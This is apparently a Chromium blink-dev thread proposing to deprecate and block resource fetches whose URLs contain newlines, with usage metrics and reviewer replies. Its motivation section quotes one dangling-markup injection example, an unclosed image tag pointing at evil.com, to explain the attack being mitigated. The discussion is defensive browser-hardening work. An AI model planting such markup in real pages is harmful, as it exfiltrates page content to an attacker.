Primary eng (and PM) emails
Summary
I'd like to add a deprecation warning for resource fetches for URLs that originally contained newline characters in the hopes that usage is curbed at levels reasonable for removal.
Motivation
As discussed in https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ, dangling markup is the next softest attack surface, assuming robust defense against direct script injection. Some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.
As it turns out, walking through and copying URLs to remove newline characters is also quite expensive (~13% of URL canonicalization time). Removing that complexity (by erroring out early) would have a marginally positive impact on perf.
Compatibility And Interoperability Risk
Moderate, depending on strategy.
URL parsing behavior is ancient, and is likely to be relied upon by the long tail. That said, the initial numbers gathered in https://www.chromestatus.com/metrics/feature/timeline/popularity/1768 aren't that terrible. While spot-checking the 94 hits in HTTP Archive[1], I realized that the 0.014% reflected in that metric is an upper-bound because a) I'm an idiot and forgot to initialize the "was whitespace removed" flag in `url::Parsed`'s copy constructor (surely random memory is always "false", right?), and b) I'm measuring all URL resolution rather than those that result in resource loads. My intuition is that the actual impact is significantly lower.
Based on the numbers we end up with, we could approach the problem in at least two ways:
1. We could block loads entirely, which is the simplest approach.
2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the URL at the end of the line, rather than scanning for a closing `)`.
I'd prefer the former, but the latter is probably lower-risk, as URLs might still work even if a few URL params are chopped off.
Alternative implementation suggestion for web developers
Explicitly encode newlines as ` `. Also escape your input and output so you don't have content-injection holes in the first place.
Usage information from UseCounter
See above.
OWP launch tracking bug
Entry on the feature dashboard
https://www.chromestatus.com/feature/5735596811091968
Requesting approval to remove too?
No. I'd target a milestone out after landing the deprecation to collect more concrete metrics than I have above.
Primary eng (and PM) emails
Summary
I'd like to add a deprecation warning for resource fetches for URLs that originally contained newline characters in the hopes that usage is curbed at levels reasonable for removal.
Motivation
As discussed in https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ, dangling markup is the next softest attack surface, assuming robust defense against direct script injection. Some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.
As it turns out, walking through and copying URLs to remove newline characters is also quite expensive (~13% of URL canonicalization time). Removing that complexity (by erroring out early) would have a marginally positive impact on perf.
Compatibility And Interoperability Risk
Moderate, depending on strategy.
URL parsing behavior is ancient, and is likely to be relied upon by the long tail. That said, the initial numbers gathered in https://www.chromestatus.com/metrics/feature/timeline/popularity/1768 aren't that terrible. While spot-checking the 94 hits in HTTP Archive[1], I realized that the 0.014% reflected in that metric is an upper-bound because a) I'm an idiot and forgot to initialize the "was whitespace removed" flag in `url::Parsed`'s copy constructor (surely random memory is always "false", right?), and b) I'm measuring all URL resolution rather than those that result in resource loads. My intuition is that the actual impact is significantly lower.
Based on the numbers we end up with, we could approach the problem in at least two ways:
1. We could block loads entirely, which is the simplest approach.
2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the URL at the end of the line, rather than scanning for a closing `)`.
I'd prefer the former, but the latter is probably lower-risk, as URLs might still work even if a few URL params are chopped off.
Alternative implementation suggestion for web developers
Explicitly encode newlines as ` `. Also escape your input and output so you don't have content-injection holes in the first place.
Usage information from UseCounter
See above.
OWP launch tracking bug
Entry on the feature dashboard
https://www.chromestatus.com/feature/5735596811091968
Requesting approval to remove too?
No. I'd target a milestone out after landing the deprecation to collect more concrete metrics than I have above.
-mike[1]:```SELECTurl,JSON_EXTRACT(payload, '$._blinkFeatureFirstUsed.Features.DocumentCompleteURLHTTPContainingNewline') AS featureFROM [httparchive:har.2017_03_15_chrome_pages]HAVING feature IS NOT NULLLIMIT 500```
--
You received this message because you are subscribed to the Google Groups "blink-dev" group.
To unsubscribe from this group and stop receiving emails from it, send an email to blink-dev+...@chromium.org.
The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?
As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?
If we could guess a best path and just be ready to course correct, that would be nice :)
On Thu, Mar 30, 2017 at 3:58 PM, Philip Jägenstedt <foo...@chromium.org> wrote:The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?I haven't fixed it yet; I was planning on doing that with the deprecation message once y'all let me at it. If you're concerned, I guess we can fix the counter and then deprecate once it hits stable and I can give you real numbers.I suspect that the numbers are high for two reasons:1. I didn't properly initialize the boolean in the copy-constructor, so there's a ~chance of non-deterministicly deciding that a URL had whitespace stripped from it, even if it hadn't.2. The use counter counted URL completions, as opposed to loads. We complete URLs all over the place, even if they're not at all related to resource loading.As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?I spot-checked 20 of the 92 hits in HTTPArchive. Of those, only 3 loaded resources that contained newlines: two were analytics scripts that scraped the `keywords` meta information, but didn't encode newlines, and one was a typo in an `<img>` that neglected to close an attribute string (which is exactly the behavior I'm aiming to change). The remainder contained one or more links whose `href` contained newlines. I'm not able to judge the contents of the links, as they were all in languages I don't speak, but only 3 were in a page's navigational menu.I can go through the other pages in more detail if that would be helpful.
If we could guess a best path and just be ready to course correct, that would be nice :)I would prefer to simply block loads. I'd only want to back off of that to a looser interpretation if the numbers show that blocking would have a larger-than-expected impact.
On Tue, Apr 4, 2017 at 5:20 PM 'Mike West' via blink-dev <blin...@chromium.org> wrote:On Thu, Mar 30, 2017 at 3:58 PM, Philip Jägenstedt <foo...@chromium.org> wrote:The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?I haven't fixed it yet; I was planning on doing that with the deprecation message once y'all let me at it. If you're concerned, I guess we can fix the counter and then deprecate once it hits stable and I can give you real numbers.I suspect that the numbers are high for two reasons:1. I didn't properly initialize the boolean in the copy-constructor, so there's a ~chance of non-deterministicly deciding that a URL had whitespace stripped from it, even if it hadn't.2. The use counter counted URL completions, as opposed to loads. We complete URLs all over the place, even if they're not at all related to resource loading.As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?I spot-checked 20 of the 92 hits in HTTPArchive. Of those, only 3 loaded resources that contained newlines: two were analytics scripts that scraped the `keywords` meta information, but didn't encode newlines, and one was a typo in an `<img>` that neglected to close an attribute string (which is exactly the behavior I'm aiming to change). The remainder contained one or more links whose `href` contained newlines. I'm not able to judge the contents of the links, as they were all in languages I don't speak, but only 3 were in a page's navigational menu.I can go through the other pages in more detail if that would be helpful.That should suffice to give us an idea about the kinds of breakage to expect. It sounds like the 3 cases that would be affected would be fairly harmless. Was the img a 404 already, or was the newline in the query string and ignored?
It sounds like most newlines are in href attributes, then, and those will not be affected at all?
Extrapolating, perhaps 15 sites or the ~500k in httparchive have resource URLs that would be blocked. That's ~0.003%, which cannot be meaninfully compared to use counter numbers, but it's a small enough number that we should probably try this and see how it goes.
If we could guess a best path and just be ready to course correct, that would be nice :)I would prefer to simply block loads. I'd only want to back off of that to a looser interpretation if the numbers show that blocking would have a larger-than-expected impact.LGTM1. Can you report back here with the new use counter numbers before the actual removal hits stable?
This only happens in CSS if there is nothing but whitespace before EOF. If you do:On Tue, 28 Mar 2017 16:00:52 +0200, Mike West <mk...@chromium.org> wrote:
1. We could block loads entirely, which is the simplest approach.
2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the
URL at the end of the line, rather than scanning for a closing `)`.
@import url(style?
garbage);
then the whole declaration is dropped -- it doesn't import "style?".
I'd prefer the former, but the latter is probably lower-risk, as URLs might
still work even if a few URL params are chopped off.
Have you searched for data: URLs specifically? Or javascript:? Or is the proposal to only reject newlines for "special" schemes?
For completeness, the only instance that is not http, https, data, or javascript, is tel:
http://www.jusmisiones.gov.ar/,http://www.jusmisiones.gov.ar/,"<area class=""noborder iopacity100 icolor147a7a"" coords=""16,64,20,64,22,68,24,72,22,77,22,79,32,88,34,88,38,83,42,85,46,87,47,89,47,92,42,96,34,96,31,94,26,92,21,88,15,80,13,76,12,74,12,70,13,67"" href=""tel:
+543764446543"" shape=""poly"" />"